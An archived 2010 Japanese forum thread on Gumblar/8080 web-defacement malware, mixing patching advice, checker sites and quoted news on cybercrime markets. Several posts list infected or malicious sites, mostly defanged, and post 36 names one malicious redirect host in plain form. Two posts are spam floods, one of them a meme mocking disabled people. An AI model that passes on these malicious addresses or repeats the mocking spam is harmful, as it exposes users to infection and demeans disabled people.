5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】

1 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:48:04
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
*** 通報したら重複を防ぐために宣言すること ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ6【8080】
http://pc11.2ch.net/test/read.cgi/sec/1266494350/

2 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:49:37
Gumblar().x、8080系ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

3 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:50:19
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

4 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:53:41
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります

●InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  ※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす

5 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:58:27
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。

【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Gumblar Checker 3(8080系用)
ttp://gumblar.s1.dynamitelife.net/ver3
・Gumblar.X Checker
ttp://gumblar.s1.dynamitelife.net/gumx/

6 :名無しさん@お腹いっぱい。:2010/03/08(月) 23:59:31
以上でテンプレ終了。


7 :1-6:2010/03/09(火) 00:05:26
>>2 修正
Gumblar().x、8080系ウイルス対処法。

Gumblar(.x)、8080系ウイルス対処法。

変なとこでみすった・・・orz

8 :名無しさん@お腹いっぱい。:2010/03/09(火) 00:10:43
>>1
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
Gumblar Checker 3=http://gumblar.s1.dynamitelife.net/ver3/result.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

9 :名無しさん@お腹いっぱい。:2010/03/09(火) 00:50:59
>>4
このスレ的には関係ないから無視すること

10 :名無しさん@お腹いっぱい。:2010/03/09(火) 00:52:08
つか>>1の*** 通報したら重複を防ぐために宣言すること ***って要らないでしょう
1人が通報したぐらいじゃ動かない所もある訳だし

11 :名無しさん@お腹いっぱい。:2010/03/09(火) 03:51:51

1.ロシア(27.89%)
2.中国(26.52%)
3.米国(9.98%)
4.ブラジル(6.77%)
5.ウクライナ(5.45%)
6.英国(5.34%)
7.フランス(3.81%)
8.ドイツ(2.41%)
9.スウェーデン(1.6%)
10.スペイン(1.37%)

セキュリティ - ZDNet Japan
http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。過去の調査では
世界2位になってしまった米国は今回、3位(10%弱)となった。

PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅したにも関わらず、ロシア
の生産量が落ちていないことを指摘している。

PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Networkがいなくなった
ところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。「結果として、過去にないくらい
多くのウイルスやスパイウェアがロシアから出てきている。そして、マルウェアの複雑さが増している」
(Shevchenko氏)

さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織よりも追跡しや
すかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティングサービスが、マレーシアや中国、
パナマ、シンガポール、タイ、トルコ、インドのサーバに目を向けている」


12 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:03:14
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


カスペルスキーがサイバー犯罪の最新動向を説明
Twitterのアカウント、闇市場で1000ドルで売買も

 フォロワー数やアカウントの利用スタイルによって価格は異なるが、
Twitterのアカウントは闇市場で1アカウントあたり500ドルや1000ドルで売買
されている――。そんなショッキングな数字を挙げて、最新のサイバー犯罪
の潜在的危険性について警鐘を鳴らすのは、ロシアのセキュリティ企業、カ
スペルスキーのセキュリティ研究者、ドミトリー・ベストゥージェフ氏だ。

 カスペルスキーは2010年1月28日にモスクワで記者向けの説明会を開
催。この中でベストゥージェフ氏は「あなたの値段はいくら?」(How much do
you cost?)と題した講演を行い、闇市場の生々しいデータや動向について
語った。ベストゥージェフ氏の講演を中心に、同社のセキュリティ専門家の
話をお伝えする。

13 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:04:10
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


なぜブラジルに多いのか?

サイバー犯罪者が集まる闇市場は、一般の市場とまったく同様に市場間の競
争や、価格決定のメカニズムが機能する売買市場となっている。売買の「場」と
なるWebサイトも、ちょうど広場やストリートで非合法の物品を売買するのと同様
に、常に各地の警察当局やISPとイタチごっこを繰り返している。

 新興国のISPを中心に、犯罪者は集散を繰り返し、メールアカウント、クレジット
カード番号、SNSアカウントなどを売買しているという。ホストしているISPが闇市
場を強制的にシャットダウンすることもあるが、問題はサイバー犯罪関連の法整
備が遅れているために、こうした犯罪行為に対するリスクが低くなっているケース
があることだという。例えば、銀行のアカウントやクレジットカード情報を盗み出す
「Trojan-Bankers」と呼ばれるマルウェアの発信源のトップはブラジルが26%でダ
ントツに高いが、この背後には「1931年に制定された法律で処理しているため、
初犯は無罪放免。2度目にようやく投獄される」(ベストゥージェフ氏)という事情が
あるという。

 捕捉されるリスクが低いことに加えて、高度に分業が進んでいることも、サイバー
犯罪に手を染める人が後を絶たない理由だ。コードを書くだけの人、ボットネットを
レンタルする人、マルウェアやスパムをばらまいてアカウントを集める人、実際に
銀行口座からお金を引き出す人、マネーロンダリングをする人、こうした人々を引
き合わせるオーガナイザーなどというように役割が細分化されている。コードだけ
書く人は、被害者の顔を見ることもないので、犯罪という意識も希薄になりやすい。

14 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:04:53
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


偽アンチウイルスソフトの年間被害額は1億5000万ドル

 カスペルスキーのような世界的セキュリティ企業ですら、具体的な犯罪者像や正
確な市場規模は把握していないというが、サイバー犯罪者の多くは、暴力や麻薬
取引に関係する「犯罪者」と異なり、見るからに犯罪者の風貌ではないのではない
か、という。1つの仮説は、ITのスキルはあっても職がない途上国や新興国の若者
が関与しているケースが多いのではなか、というもの。ブラジルの事例でこれが確
認されたこともあるという。

 闇市場の規模については、例えば近年被害が急増している「Fake AV」と呼ばれる
偽アンチウイルスソフトで、FBIへ寄せられた苦情を元に1億5000万ドルの被害額と
いう試算があるという。Fake AVに感染したPCにはポップアップ画面で多数のウイル
スに感染していると警告が出て、ウイルスの駆除のために正式版にアップグレード
するよう促される。Fake AVの画面は正当なアンチウイルスソフトのように見え、価格
も妥当。多くの人が被害にあっている。このFake AVは300種程度の存在が確認され
ており、そこから「最低でも1万人規模の犯罪者が関与している可能性がある」(イギ
リス担当シニア・リージョナル・リサーチャー デイビッド・エム氏)という。

15 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:05:34
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


警戒レベルが低いSNSのアカウントには高い価値

 闇市場でやり取りされる「情報」の価格はさまざまだ。例えば「クレジットカード番号
は、国やカード会社によって価格は違う」(ベストゥージェフ氏)といい、アメリカ在住者
のVISA、マスターカードなら1件当たり2ドルだが、同じカードでも英国在住者のもので
あれば4ドル、オーストラリアなら5ドル、EUなら6ドルなどとなる。ゴールドカード、プラチ
ナカードになればさらに価格は上がる。銀行のアカウントであれば、残高やログインが
確認できているかなどの条件によって、価格は数ドルから数十ドルと変わる。

 急激に狙われるようになっているのがSNSアカウントだ。カスペルスキーの調査によ
れば、2008年に約3万程度確認されていたSNSをターゲットにしたマルウェアは、2009
年に約6万と倍増したという。SNSは知人、友人、家族など信頼できる人を中心につな
がっていることが多いため、警戒感がない利用者が多い。

 このため、例えば5000ユーザーとつながったFacebookのアカウントが300ドルで売ら
れるケースや、数百程度のフォロー、フォロワーを持つTwitterの女性アカウントが数百
ドルや1000ドルで売買されるケースも確認しているという。

16 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:06:15
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


今後は地理情報を利用し、自動化された攻撃も

 高度に発達するSNSやWebサービスを利用して、今後は攻撃の「自動化」が進行する
だろう。こう予測するのは「なぜ災害はいつもあなたの都市を襲うのか?」(Why does the
disaster always strike your city?)と題した講演を行ったステファン・テナス氏だ。

 SNSでは地理情報や個人の嗜好といった情報を共有し、これが効率的なターゲット広告
というイノベーションを生み出す土壌になっているが、これは同時にサイバー犯罪者たち
にとっても利用価値の高い情報だ。

 例えば、地理情報。ユーザーの住む場所を取得し、偽のニュースサイトに掲載する速報
に、あたかもそのユーザーが住む都市で爆破事件が起こっているかのように見せることが
可能だろうという。見ている全員が、それぞれ都市名の部分だけをすり替えられたニュース
を読む。さらに、Google翻訳のAPIを利用して都市名を英語名で埋め込むようなこともできる。

 Koobfaceと呼ばれるマルウェアは、マルウェアをダウンロードさせるWebサイトへのリンク
が張られたメッセージを、Facebookのユーザーになりすまして投稿する。これをクリックした
Facebookの「友人」らは、偽のFlashプラグインへのアップデートを促されるという。このとき、
上記のような偽ニュースが使われれば、早く映像を見たいという気持ちからプラグインをダウ
ンロードする確率は上がるだろう。


 現在、SNSで広がる攻撃は、初心者ユーザーをターゲットにしていて初歩的なソーシャル
・エンジニアリングを使っているものが多いという。それでも十分に効果があるからだ。カス
ペルスキーでは、2010年にはこうした攻撃の高度化や自動化が進むと見ているという。また、
モバイル端末を狙ったモバイルボットネットの登場も時間の問題だろうと考えているという。

17 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:06:56
@IT - アットマーク・アイティ 2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


一般的なインターネットユーザーの値段:920ドル

 従来、サイバー犯罪といえば銀行口座のパスワードやクレジットカード番号など直接的に
換金可能な情報が中心だった。このため、オンラインショッピングやオンラインバンキングを
利用しないPCユーザーは安全に感じているかもしれない。ところがベストゥージェフ氏は、
犯罪者にとっては狙う価値がないユーザーはいないという。

 オークションサイトやSNSのアカウントには価値があるし、アカウントが何もないとしても、ネ
ットワーク接続されたPCには犯罪者にとって利用価値がある。DDoS攻撃のボットネットとして
バルクで換金できるからだ。2009年10月から広がっているGumblarシステムも、いまや7万台
のサーバが感染した状態のまま超広帯域のボットネットを構成している。ホームPCが7万台の
ボットネットに比べて1000倍程度のDDoS攻撃の能力があることを意味する。一切人手を介さ
ずにサーバとクライアント間で巧みに自己拡大するGumblarは2009年12月に活動をやめて感
染拡大は止まっているが、大規模なDDoS攻撃に備えている可能性のほかに、闇市場で攻撃
インフラの売買を始めている可能性も考えられるという。

 ベストゥージェフ氏は講演の最後に、簡単なフォームを使って、ユーザー1人当たりが持つ情
報の値段を弾き出してみせた。メールアカウント3つ、残高が3000ドルの銀行のアカウントが1つ、
Facebookのアカウントが1つ、ブロードバンド接続のPCは2台、などと標準的なインターネットユー
ザーの有益な情報を闇市場の価格を元に計算すると、実に920ドル。闇市場においてデジタル
データは想像以上の高値で取り引されているようだ。

18 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:17:12
^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

   (^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

19 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:27:29
※以上は人間への感染例です

20 :名無しさん@お腹いっぱい。:2010/03/09(火) 07:33:33
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

  アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹

21 :名無しさん@お腹いっぱい。:2010/03/09(火) 11:10:10
ここも7スレ目で打ち止めだな、こりゃ…

22 :名無しさん@お腹いっぱい。:2010/03/09(火) 11:42:49
良い意味でですか?

23 :名無しさん@お腹いっぱい。:2010/03/09(火) 13:52:50
前スレで報告があったページで今もスクリプトが埋まってるのは少なくとも54
その中でgoogleセーフブラウジングが警告するのは18

24 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:11:09
>>21
IDの出ないセキュ板は荒れるからなあ
いっそインターネット板にでも移住するかね

とはいえ最近はアップデート以外の対策が難しくなってきているから
このスレの役目も終わりに近づいてるのかも知れんが

25 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:14:42
>>23
どれよ?
通報しるから列挙しる!

26 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:17:50
もう周知徹底してるから必要ないかも

27 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:20:16
>>25
増えそうだからちょっと待って

28 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:32:59
1benpi●mecha-kawa●com
1kyujin●mecha-kawa●com
15kinyu01●kyashingoo●com
18kinrpg●com
21kinyu01●kyashingoo●com
21saimu04●manjusyage●com
34di●mecha-kawa●com
54wanwanmonogatari68●info/
brownie-mart●com
camp●kanji2001●com
e-risingsun●net
ebook-style●com/modules/xfsection/index●php?
ec●uuhp●com/~chillnet
faac3020●cpinet●jp/
hanahaitatsu●com/
hout●kanji2003●com
info0825●com/horihori
jkjom●com
joseiyodwife●com
junkankangoshi●com/cat1039
kagoshima●cool●ne●jp/fantasy_17/
kateikyousi-turtle●com
kei●keita-house●com/torabaayu_kansai
kinzokunensuu●com
kinzokunensuu●com/cat993
lblgs●com/
link●sfidalife●com
manjusyage●com/
mizuhaitatsu●com
park21●wakwak●com/~enyaraya/
pc-net●webinfo●jp
pipestudio●net

29 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:33:51
seikakutest●net
shaddytoriyosesite●livedoor●biz
shogaishakoyo●com/
suemari●com/movie
sunrise●2pg●in/suzukiucar/index2●html
thismonky●com
unmeideai●com
www●1biyou●net
www●avis●ne●jp/~muranaka/
www●borneomarathon●com/jpn/home●html
www●dgnx●net/
www●g-mania●org
www●gocha-mix●net/cgi-bin/blog/
www●hct●zaq●ne●jp/cpacs503/
www●jpdrag●com
www●kadoma-c●com
www●kidscorner●jp/main●php
www●kikuyakikai●com
www●oumc-obog●com/2008/01
www●pzaki●com
www●ruco25●net
www●sesica●co●jp
www●shinnippo●co●jp/ssff/2006hiroshima/
www●sue-arc●com
www●win-win777●com/karuizawa/
www12●plala●or●jp/atakashi/sk
www13●plala●or●jp/metal-militia/
www2●odn●ne●jp/2711726/
www2●odn●ne●jp/2711726/index_02●html
www4●ocn●ne●jp/~ikl/member/index●htm
xn--com-r10es86d●jp/

30 :名無しさん@お腹いっぱい。:2010/03/09(火) 14:59:59
>>26


31 :名無しさん@お腹いっぱい。:2010/03/09(火) 16:56:45
63サイトのうち33サイトがデジロック

32 :名無しさん@お腹いっぱい。:2010/03/09(火) 17:00:09
このような何ら対策を講じようとしないホスティングサービス屋は,
しかるべきところに通報し行政指導されるべきだ

33 :名無しさん@お腹いっぱい。:2010/03/09(火) 17:19:25
その行政が穴のあいた鯖使ってるから困る

34 :コテハン:2010/03/09(火) 18:02:08
実は新コード来てるし・・・
//www●dd●iij4u●or●jp/~ceh3/span/juku/main●html
註:精神的ブラクラに注意w

「.substr」が目立つ
※チェッカー3は無反応。


35 :名無しさん@お腹いっぱい。:2010/03/09(火) 18:12:55
>>34のvirustotal
ttp://www.virustotal.com/jp/analisis/2b1cff715623cb02da57fc11fb3cecd9fbc40b69b27a73f1283b037d781294e9-1268125738
結果: 0/42 (0%)

36 :名無しさん@お腹いっぱい。:2010/03/09(火) 18:16:55
>>34
こんな感じか
//bild-de.careerbuilder.com.bile-de.thew.ru:8080

37 :コテハン:2010/03/09(火) 18:19:32
職場のPCで無謀な事はできんので、
帰宅後に発掘作業を再開する・・・

でも、残業がががorz

38 :名無しさん@お腹いっぱい。:2010/03/09(火) 18:47:23
そうだ、googleにスパム報告すればいいんだ・・・

39 :名無しさん@お腹いっぱい。:2010/03/09(火) 19:15:07
>34
http://tinyurl.com/check8080
でひっかかる

40 :コテハン:2010/03/09(火) 20:04:24
一件だけ投下・・・
//www●kikuyakikai●com/index●html ←再発


41 :名無しさん@お腹いっぱい。:2010/03/09(火) 22:08:26
>>34
何この俺得サイト

42 :名無しさん@お腹いっぱい。:2010/03/10(水) 12:28:08
Internet Explorer の脆弱性により、リモートでコードが実行される
公開日: 2010年3月10日 | 最終更新日: 2010年3月10日
ttp://www.microsoft.com/japan/technet/security/advisory/981374.mspx

問題を緩和する要素:
Internet Explorer 8 は、この脆弱性による影響を受けません。

43 :名無しさん@お腹いっぱい。:2010/03/10(水) 12:37:40
IE5.01とIE8は影響を受けないのか

44 :名無しさん@お腹いっぱい。:2010/03/10(水) 12:59:57
28-29に追加
bikebikekaitori●com

45 :名無しさん@お腹いっぱい。:2010/03/10(水) 15:25:35
firefoxに移行したから
IE削除するかな

46 :名無しさん@お腹いっぱい。:2010/03/10(水) 15:30:40
Microsoft Updateするから残しとけ
自己責任で

47 :名無しさん@お腹いっぱい。:2010/03/10(水) 17:50:28
狐でもマイクロソフトからあるアドオンをDLして有効化したらアップデート使えるよ?なんて名前のアドオンか忘れたけど
何時頃からかは知らんがEUのお偉いさん連中がWindowsにIEを初期付属してるのが法律違反だとかほざくからだろうけど

48 :名無しさん@お腹いっぱい。:2010/03/10(水) 17:56:49
日本語で

49 :名無しさん@お腹いっぱい。:2010/03/10(水) 18:12:08
スレ1からスレ5までに報告があったページで、今スクリプトが埋まってるURL
coolfocus●jp/seminar/heartful
jaguarracing●xf●cz/xmlrpc●php
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
shop●relax-living●net/bike11/
www●elmwoodguestcottage●com/
www●hakuchi●jp/57577/
www●hakuchi●jp/OTSUYA/
www●hervochapiteaux●be
www●i-paradise5●jp/~simple/otona/index●php
www●mfreep●com

50 :名無しさん@お腹いっぱい。:2010/03/10(水) 20:29:39
【クラウド】「gred AntiVirusアクセラレータ」ETHOSエンジンを追加し、さらにウイルス検知機能を強化
http://tsushima.2ch.net/test/read.cgi/news/1268217548/

51 :名無しさん@お腹いっぱい。:2010/03/11(木) 01:03:03
また糞狐が釣ってるのか

52 :名無しさん@お腹いっぱい。:2010/03/11(木) 14:35:14
Gumblar(.x)っぽいの
//www●kiyasuisan●co●jp

//gabler-bayreuth●de/cgi-bin/default●php

//alicosrl●it/templates/403●shtml●php
--
//gabler-bayreuth●de/

//pecsa●com●pl/

//seovisiongroup●com/

すっ飛ばしまくって→あふぃ=メシウマ?


53 :名無しさん@お腹いっぱい。:2010/03/11(木) 15:03:23
日本語でおk

54 :名無しさん@お腹いっぱい。:2010/03/11(木) 15:36:53
>>52
ウィルスに感染するの?

55 :名無しさん@お腹いっぱい。:2010/03/11(木) 22:08:20
>>40
ウイルスバスターがブロック(キリッ

>>34
ウイルスバスター(笑)がスルー

56 :名無しさん@お腹いっぱい。:2010/03/11(木) 23:07:29
大きなニュースが無いからつまらないな。
感染自体は広がってるんだが

57 :名無しさん@お腹いっぱい。:2010/03/12(金) 02:44:53
感染を調べる一つの手段として
セーフモードで起動してスタートアップに何ちゃらってやつと
ファイル名を指定して実行→regeditどうたらっていうのがあったと思うのですが
あのテンプレみたいの持ってる方いましたら貼ってもらえませんか?

58 :名無しさん@お腹いっぱい。:2010/03/12(金) 02:46:43
そんなモンテンプレみなきゃ分からんレベルなら
感染してるかと思ったら素直に再インストしろ

59 :名無しさん@お腹いっぱい。:2010/03/12(金) 08:24:14
>>57
そんなもんあっても1週間もあればウイルスのファイル名が変わるなんてざらだから役にたたん
普段から自動起動しているファイルを調べてないやつには判別もできん
素直にクリーンインスコしろ

60 :名無しさん@お腹いっぱい。:2010/03/12(金) 10:36:30
oimachi-chintai●com/sitemap/

61 :名無しさん@お腹いっぱい。:2010/03/12(金) 11:06:30
まあ>>57のことだから
リカバリしてもまた感染するだろうなwww

62 :名無しさん@お腹いっぱい。:2010/03/12(金) 14:24:14
>>57
( ゚Д゚)ポカーン

63 :名無しさん@お腹いっぱい。:2010/03/12(金) 14:40:48
//ggcomputer●com/index●html
「dT.prototype =」


64 :名無しさん@お腹いっぱい。:2010/03/12(金) 15:24:31
株式会社ジェー・ディー・イー JDE
www●jde-net●co●jp/engineering/index●php



65 :名無しさん@お腹いっぱい。:2010/03/12(金) 17:59:52
【IE 6/7の脆弱性:深刻な状況、早急に対策を〜掲示板に誘導書き込みのワナも】
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2182
>攻撃コードが公になったのは11日早朝。
>セキュリティベンダーの情報をもとに攻撃サイトが突きとめられ、
攻撃コードが拾われてしまった。
>このコードが使われると、回避策を適用していないIE 6/7では、
悪質なサイトにアクセスするだけでウイルスに感染してしまうおそれがある。
>コードは、現在も継続中のサイト改ざん攻撃にも即転用が可能で、被害が懸念される。

Mカフィー\(^o^)/オワタw

66 :名無しさん@お腹いっぱい。:2010/03/12(金) 18:09:47
何やってんのマカフィー

67 :名無しさん@お腹いっぱい。:2010/03/12(金) 19:51:18
いつもどおりソースコードをコピペでパクれよ馬鹿フィー

68 :名無しさん@お腹いっぱい。:2010/03/12(金) 19:56:28
マカフィー使ってる奴は情弱かnecユーザーかあどびの社員

69 :名無しさん@お腹いっぱい。:2010/03/12(金) 20:00:53
アドビの社員は使ってないだろ
使ってるのはFlash Playerとか落としに行ったやつ

70 :名無しさん@お腹いっぱい。:2010/03/12(金) 20:29:07
>>69
いや、ごめん、全部 俺のことなんだ

71 :名無しさん@お腹いっぱい。:2010/03/12(金) 21:43:54
昔マカフィーのウィルススキャン使ってたらバグで受信トレイの中身全部消えて死にたくなった

72 :名無しさん@お腹いっぱい。:2010/03/12(金) 23:03:53
昔のノートンでもそんなバグなかったか?

73 :名無しさん@お腹いっぱい。:2010/03/12(金) 23:15:50
MSのでもあったろ

